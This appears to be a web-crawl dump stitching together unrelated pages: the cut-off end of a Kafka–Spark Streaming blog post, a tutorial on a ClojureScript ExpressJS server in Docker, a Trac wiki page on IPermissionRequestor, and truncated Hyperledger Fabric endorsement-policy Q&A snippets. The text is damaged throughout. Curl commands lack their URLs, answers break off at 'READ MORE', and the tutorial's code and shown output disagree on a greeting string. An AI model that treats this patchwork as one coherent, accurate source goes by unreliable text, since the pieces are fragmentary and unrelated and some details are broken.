Let’s revise Apache Kafka Architecture and its fundamental concepts Thus each record is received by Spark Streaming effectively exactly once despite failures. Hence, make sure our output operation that saves the data to an external data store must be either idempotent or an atomic transaction that saves results and offsets. That helps to achieve exactly-once semantics for the output of our results. Although, there is one disadvantage also, that it does not update offsets in Zookeeper, thus Zookeeper-based Kafka monitoring tools will not show progress. But still, we can access the offsets processed by this approach in each batch and update Zookeeper yourself. So, this was all about Apache Kafka Spark Streaming Integration. Hope you like our explanation. Spark Streaming Checkpoint in Apache Spark 4. Conclusion Hence, in this Kafka- Spark Streaming Integration, we have learned the whole concept of Spark Streaming Integration with Apache Kafka in detail. Also, we discussed two different approaches for Kafka Spark Streaming configuration and that are Receiving Approach and Direct Approach. Moreover, we discussed the advantages of the Direct Approach. Furthermore, if any doubt occurs, feel free to ask in the comment section. See also – Kafka Cluster For reference Question is if I will run createstream job for one topic with 3 partitions with 6 executors and each executor having 2 cores. How many Receivers will be used on how many executors? I though 3 receiver will run on 3 executors and will use one CPU each. Additional available CPU will be used to process task. Adition 3 executors available with 2 CPU each wont be used until we repartition rdd() to process the data.
https://data-flair.training/blogs/kafka-spark-streaming-integration/
CC-MAIN-2019-47
en
refinedweb
A Clojurescript API Server in Docker using ExpressJS. So you know what to expect, I’m going to talk about the ClojureScript project file, then the Javascript package file (needed for native Javascript packages), then the code itself, and finally the Dockerfile to build the Docker image. Clojure and ClojureScript If you haven’t encountered it before, Clojure is a Lisp dialect which runs on a JVM and interoperates with Java. As a Lisp dialect, Clojure is a functional programming language, dynamic in nature, has a code as data philosophy, and encourages immutability. ClojureScript is a compiler for Clojure, which generates Javascript. This gives two complementary directions on its use. Firstly, it gives another language which can be used in the browser (addressing concerns some people have around Javascript). Secondly, if you are already writing code in Clojure on your server, this gives a way of running some of that code in the browser (e.g. to do validation). The Challenge What I wanted to do was to generate server-side Javascript from ClojureScript, allowing me to continue to use Clojure as a language, but to overcome some of the challenges around Java-based microservices. Before I looked at ClojureScript, I assumed this would be a trivial matter — just write Clojure as I had been, but compile it in a different way. The fact that I am writing this blog, hints at the fact that it was not so simple. The primary challenge is that although Clojure itself can be pretty much consumed by the ClojureScript compiler, some features rely on Java, some libraries are not ClojureScript-compatible, and sometimes I use Java libraries or other JVM-based DSLs (such as Drools). This meant that I could not just use my standard stack, I needed to look for some replacements. The General Approach I immediately found that huge chunks of my stack weren’t compatible — this included the Ring libraries I use for actually creating a web server, and the Liberator library I use for routing and validating API calls. I decided to use ExpressJS as the obvious choice to replace these (although I may look into Loopback in the future. Fortunately, my logging library of choice, Timbre, is ClojureScript-ready, so I could continue to use that. Since this is a simple proof of concept (I’m just going to serve some canned responses), that’s all I need. The project.clj File I use Leiningen to build my Clojure projects, so I need to create a project.clj file to handle everything. This begins with some standard items (including the project name which is map-server, because of where I want to eventually go with this): (defproject map-server "0.1.0-SNAPSHOT" :description "ExpressJS in ClojureScript proof of concept" :url "" :license {:name "Eclipse Public License" :url ""} Next we have the dependencies. I tend to group these into areas, and comment the area: :dependencies [; Core Clojure [org.clojure/clojure "1.8.0"] [org.clojure/clojurescript "1.9.946"] ; Logging [com.taoensso/timbre "4.10.0"]] Next we have any plugins. The important one for us is the plugin to actually build ClojureScript (usually abbreviated to cljs): :plugins [[lein-cljsbuild "1.1.7"]] Finally, we have the information needed to build the Javascript from the ClojureScript. This includes items such as where to find the source files, where to write the output files, and where to find the overall main function: :cljsbuild { :builds [{:source-paths ["src/cljs"] :compiler {:output-to "resources/public/core.js" :optimizations :advanced :externs ["node_modules/body-parser/index.js" "node_modules/express/lib/middleware/init.js" "node_modules/express/lib/middleware/query.js" "node_modules/express/lib/router/index.js" "node_modules/express/lib/router/layer.js" "node_modules/express/lib/router/route.js" "node_modules/express/lib/application.js" "node_modules/express/lib/express.js" "node_modules/express/lib/request.js" "node_modules/express/lib/response.js" "node_modules/express/lib/utils.js" "node_modules/express/lib/view.js" "externs/externs.js"] :target :nodejs :main "map-server.core"}}]}) Two key items to note are the optimizations and the externs. I’ve opted to turn on full optimisation here, which uses Google’s Closure. This can sometimes cause problems if you are using pure Javascript libraries which are not Closure-ready (in which case you can set it to none if you wish). The second item is the externs list. Because I will be using ExpressJS as a standard Javascript library, and because it is not Closure-ready, I need to specify where to find all the various entrypoints to functions in it. The package.json File I will be using ExpressJS, which is a pure Javascript library. ClojureScript will therefore not know how to import it, so I will use npm for that. I will therefore create a package.json file to make that easier to do. This is a very simple file, basically just listing ExpressJS as a dependency: { "name": "map-server", "version": "0.0.1", "description": "ExpressJS / ClojureScript proof of concept", "main": "app.js", "directories": { "doc": "doc", "test": "test" }, "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "Ian Finch", "license": "EPL", "dependencies": { "express": "^4.16.1" } } Now I just need to run npm install and I get ExpressJS and its dependencies in the location I already specified in my project.clj. The Source Code Clojure can be very specific about where files go, so I tend to use the same directory structure that Leiningen’s scaffolding sets up. I therefore put my core ClojureScript for my map-server namespace at src/cljs/map-server/core.cljs. I begin with a namespace declaration, together with require statements for any libraries I will be using: (ns map-server.core (:require [cljs.nodejs :as node] [taoensso.timbre :as log])) Next, I do the equivalent of NodeJS’s require, to make the ExpressJS module available: (def express (node/require "express")) Now I write a simple request handler for any API calls. Because I am using ExpressJS, these will be in the format expected by ExpressJS — a function which accepts a request and a response object, and which returns a modified response object: (defn handler "Function to handle a simple request" [req res] (log/info "Request:" (.-method req) (.-url req)) (-> res (.status 200) (.json (clj->js {:message "Hello Clojurescript"})))) Just like in standard Clojure, a function name beginning with a dot invokes a method call on the object given as the first parameter. Obviously, the difference here is that this is a Javascript object rather than a Java object. ClojureScript extends this notation, so that if the character after the dot is a dash, it retrieves the value with that name from the object. So, in the above function, the expression (.-url req) gets the contents of the variable url from the object req (in Javascript this would be req.url). The thread function makes the function calls less obvious, but if I unthread it, the expression (.status res 200) invokes the status method on the res object with the value 200 (or res.status(200) in Javascript). Finally, because we want to return a JSON structure, I use the handy clj->js function to convert my ClojureScript map into a Javascript object, then call the response’s json function to set that as the body of the response. You can therefore see that the above function simply logs a message describing the request, sets a success status, and supplies a hard-coded message as the body of the response. It’s also convenient to know when our web server has started up, so I also wrote a brief callback which just logs a message: (defn server-started-callback "Callback triggered when ExpressJS server has started" [] (log/info "App started at")) We can now pull all this together in our main function, which creates a new Express instance, adds our handler for when someone requests /, and starts listening on port 3000: (defn -main "Our main handler" [& args] (doto (new express) (.get "/" handler) (.listen 3000 server-started-callback))) So, now I can fire up my server and try a couple of requests. Here is the output: [docker@minikube:~]$ curl {"message":"Hello ClojureScript"} [docker@minikube:~]$ curl <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Error</title> </head> <body> <pre>Cannot GET /foo</pre> </body> </html> And here is what I see in the console: INFO [map-server.core:11] - App started at INFO [map-server.core:32] - Request: GET / Note that the /foo request doesn’t show in the logs, since it doesn’t reach my handler. We Need More Idioms So, that works, but it feels like Javascript written as Clojure. Additionally, if we add a second URI, we will need a new handler for that, which will have to do its own logging, its own JSON conversions, etc. So, let’s convert our handler function into a generic one which handles the grunt work, then our URI-specific handlers only need to add their specific functionality: (defn handler "Function to handle a generic route" [handler-fn] (fn [req res] (log/info "Request:" (.-method req) (.-url req)) (-> res (.status 200) (.json (clj->js (handler-fn req res)))))) This is almost identical to the earlier handler, but it now returns a function which does the actual handling of the request, rather than doing it itself. To accomplish this, it takes as a parameter a function which does the request-specific part of handling the request. You can see that passed in function being called in the last line of the above code. We can now modify our main function to use the above function in its routing calls. (defn -main "Our main handler" [& args] (doto (new express) (.get "/" (handler (fn [request response] {:message "Hello ClojureScript"}))) (.get "/xyzzy" (handler (fn [request response] {:result "Nothing happens"}))) (.listen 3000 server-started-callback))) We can run this, to check it behaves as expected: [docker@minikube:~]$ curl {"message":"Hello ClojureScript"} [docker@minikube:~]$ curl {"result":"Nothing happens"} [docker@minikube:~]$ To make it easier to configure, we can make the routes more flexible by accepting multiple types of argument (strings, objects and functions) and converting them all to functions. This would allow us to use a more concise syntax: (defn -main "Our main handler" [& args] (doto (new express) (.get "/" (handler "Hello ClojureScript")) (.get "/xyzzy" (handler {:result "Nothing happens"})) (.get "/echo" (handler (fn [req _] {:method (.-method req) :url (.-url req)}))) (.listen 3000 server-started-callback))) We can do this by adding a function to test the type and convert it to a canonical function format: (defn canonicalise-fn "Create a function, depending on input type" [item] (cond (fn? item) item (string? item) (fn [_ _] {:message item}) :else (fn [_ _] item))) We glue this all together by calling the canonical function from our handler: (defn handler "Function to handle a generic route" [handler-fn] (let [canonical-fn (canonicalise-fn handler-fn)] (fn [req res] (log/info "Request:" (.-method req) (.-url req)) (log/debug "Request:" (obj->clj req)) (-> res (.status 200) (.json (clj->js (canonical-fn req res))))))) So, now we have our server, we just need to stick it in a Docker container. The Dockerfile The Dockerfile is really straightforward: - Our ClojureScript has been compiled into a Javascript file at resources/public/core.js (as defined in our project.clj). - Our supporting modules (ExpressJS and dependencies) are in node-modules. - To run our Javascript, we just use the node command followed by the name of our Javascript file. So, we need a base node image (I’ll use the alpine version for a smaller container), we need to copy our files to a suitable directory, and then issue the node command. So our Dockerfile is this: FROM node:alpine COPY map-server/resources/public/core.js /usr/src/node/map-server.js COPY map-server/node_modules /usr/src/node/node_modules WORKDIR /usr/src/node CMD node map-server.js This gives me an 80MB Docker image, which starts up quickly and is available to serve web pages immediately. Summary As a Proof of Concept, this has demonstrated that it is possible to build a containerised API server in ClojureScript, leveraging Javascript modules. My next step will be to look at some more API-specific server modules (such as loopback.io) or some of the ClojureScript libraries which are starting to appear (such as macchiato-framework.github.io). The code used in this article is available on GitHub at ianfinch/cljs-expressjs
https://ian-says.com/articles/clojurescript-expressjs-docker-api-server/
CC-MAIN-2019-47
en
refinedweb
Extension Point : IPermissionRequestor The (somewhat confusingly named) IPermissionRequestor simply allows components to define permission actions (and meta permission actions and their relations to other permission actions). Purpose Many of Trac's features are only available to users with certain permissions. By default these are the coarse permissions described in TracPermissions. More fine-grained per-resource permissions as described by TracFineGrainedPermissions are also possible. While a component can check for any permissions already defined by other components, it might want to define its own permission types for its actions on resources. Usage Implementing the interface follows the standard guidelines found in TracDev/ComponentArchitecture and of course TracDev/PluginDevelopment. Only one method has to be defined: get_permission_actions(). This method should return a list of permission actions. Each action is either the name of the action (a simple string) or, for so called meta permissions a tuple, where the first tuple item is the name of the action, and the second tuple item is a list of subsumed action names. (The meta permission covers all listed permissions. If multiple implementations return the same meta permission, they are combined.) Action names should be in ALL_CAPS_WITH_UNDERSCORES and usually consist of two parts: - The resource type / module name. - The action to perform on that resource. The most common action is VIEW, to allow basic usage (viewing) of a resource. It is often required for components implementing IRequestHandler, where process_request() would check for permissions categorically ( req.perm.require('RESOURCE_VIEW')) or selectively ( if 'RESOURCE_ACTION' in req.perm:). (Such an IRequestHandler - or any other kind of checked resource access - could also be implemented by any other Component.) Anyone with access to a perm ( trac.perm.PermissionCache) can perform permission check. It is usually obtained from req (a trac.web.api.Request). More fine-grained per-resource permission checks can be performed by obtaining a specialized cache using req.perm(resource) or req.perm(realm, resource_id). A slightly more complex pattern is to return multiple simple RESOURCE_ACTION permission actions and one RESOURCE_ADMIN meta permission action covering the others. Even more complex hierarchies of permissions are possible. (See #Ticket) Examples Minimal A minimal IPermissionRequestor in isolation is not very useful (but possible) and usually accompanied by implementations of other interfaces that require these permissions. Hence the following example is best understood in context of the ComponentModuleExamples. In Trac, components have no associated permissions. The following example defines two new permissions to be checked elsewhere: from trac.core import Component, implements from trac.perm import IPermissionRequestor class ComponentModule(Component): implements(IPermissionRequestor) def get_permission_actions(self): return ['COMPONENT_LIST', 'COMPONENT_VIEW'] Upgrade example If a new version of a component renames / merges / splits existing permissions of an older version, it might want to implement an environment upgrade (IEnvironmentSetupParticipant). A real example would be TracPastePlugin, which changed from a single permission PASTEBIN_USE to multiple permissions PASTEBIN_VIEW and PASTEBIN_CREATE. In this changeset, ( environment_needs_upgrade checks _has_old_permission for any of the old permissions and upgrade_environment calls convert_use_permissions (via the version_map if required) to convert them to the new permissions. Available Implementations Simple One of the simplest use cases is to define one permission to view the resources of that module: - trac.timeline.web_ui.TimelineModule return ['TIMELINE_VIEW'] - trac.search.web_ui.SearchModule return ['SEARCH_VIEW'] - trac.about.AboutModule return ['CONFIG_VIEW'] Ticket The most complex example in Trac itself. Various meta permissions subsume certain / all other permissions for convenience. - trac.ticket.api.TicketSystem return ['TICKET_APPEND', 'TICKET_CREATE', 'TICKET_CHGPROP', 'TICKET_VIEW', 'TICKET_EDIT_CC', 'TICKET_EDIT_DESCRIPTION', 'TICKET_EDIT_COMMENT', ('TICKET_MODIFY', ['TICKET_APPEND', 'TICKET_CHGPROP']), ('TICKET_ADMIN', ['TICKET_CREATE', 'TICKET_MODIFY', 'TICKET_VIEW', 'TICKET_EDIT_CC', 'TICKET_EDIT_DESCRIPTION', 'TICKET_EDIT_COMMENT'])] - trac.ticket.report.ReportModule actions = ['REPORT_CREATE', 'REPORT_DELETE', 'REPORT_MODIFY', 'REPORT_SQL_VIEW', 'REPORT_VIEW'] return actions + [('REPORT_ADMIN', actions)] Roadmap For historical reasons a bit unintuitive. Planned to be simplified in the future (see #4292 / #3022) - trac.ticket.roadmap.RoadmapModule actions = ['MILESTONE_CREATE', 'MILESTONE_DELETE', 'MILESTONE_MODIFY', 'MILESTONE_VIEW', 'ROADMAP_VIEW'] return ['ROADMAP_VIEW'] + [('ROADMAP_ADMIN', actions)] - MilestoneModule actions = ['MILESTONE_CREATE', 'MILESTONE_DELETE', 'MILESTONE_MODIFY', 'MILESTONE_VIEW'] return actions + [('MILESTONE_ADMIN', actions)] Wiki - trac.wiki.web_ui.WikiModule actions = ['WIKI_CREATE', 'WIKI_DELETE', 'WIKI_MODIFY', 'WIKI_RENAME', 'WIKI_VIEW'] return actions + [('WIKI_ADMIN', actions)] Permissions As an interesting peculiarity, permissions to manipulate permissions: - trac.admin.web_ui.PermissionAdminPanel actions = ['PERMISSION_GRANT', 'PERMISSION_REVOKE'] return actions + [('PERMISSION_ADMIN', actions)] Version control An example of a component to combine permissions of other components into a meta permission. - trac.versioncontrol.admin.VersionControlAdmin return [('VERSIONCONTROL_ADMIN', ['BROWSER_VIEW', 'CHANGESET_VIEW', 'FILE_VIEW', 'LOG_VIEW'])] - trac.versioncontrol.web_ui.browser.BrowserModule return ['BROWSER_VIEW', 'FILE_VIEW'] - trac.versioncontrol.web_ui.changeset.ChangesetModule return ['CHANGESET_VIEW'] - trac.versioncontrol.web_ui.log.LogModule return ['LOG_VIEW'] Additional Information and References - epydoc - API Reference - Ticket about extending exsting meta-permissions: #8036 - Mailing list message about the initial design of IPermissionRequestor, IPermissionStore and IPermissionGroupProvider
https://trac.edgewall.org/wiki/TracDev/PluginDevelopment/ExtensionPoints/trac.perm.IPermissionRequestor
CC-MAIN-2019-47
en
refinedweb
11627/how-to-configure-endorsement-policy-in(..) Example: "AND('Org1.member', 'Org2.member')" When you execute peer instantiate chaincodeName you have to pass -P policyString where policyString is the expression shown as in the above example Ex: peer chaincode instantiate -C testchainid -n mycc -p github.com/hyperledger/fabric/examples/chaincode/go/chaincode_example02 -c '{"Args":["init","a","100","b","200"]}' -P "AND('Org1.member', 'Org2.member')" What the logic -P "AND('Org1.member', 'Org2.member')" in your code mean? You can use the OR gate for this. Refer the below logic. -P "AND('Org1.member', 'Org2.member')" You can also use nested logic. Suppose you want to request one signature from a member of the Org1 MSP or 1 signature from a member of the Org2 MSP and 1 signature from a member of the Org3 MSP. Then you can use the following logic: OR('Org1.member', AND('Org2.member', 'Org3.member')) Endorsement policy can be set by using the -P switch. When instantiating the chaincode, use the -P switch following by a Boolean logic representing which peer or organization has to sign the transaction. $ peer chaincode instantiate <other parameters> -P <boolean logic> Give the proposal responses you are receiving ...READ MORE I know it is a bit late ...READ MORE The peers communicate among them through the ...READ MORE Summary: Both should provide similar reliability of ...READ MORE To read and add data you can ...READ MORE This will solve your problem import org.apache.commons.codec.binary.Hex; Transaction txn ...READ MORE To do this, you need to represent ...READ MORE I think the docker-compose tool is not ...READ MORE OR Already have an account? Sign in.
https://www.edureka.co/community/11627/how-to-configure-endorsement-policy-in-hyperledger
CC-MAIN-2019-47
en
refinedweb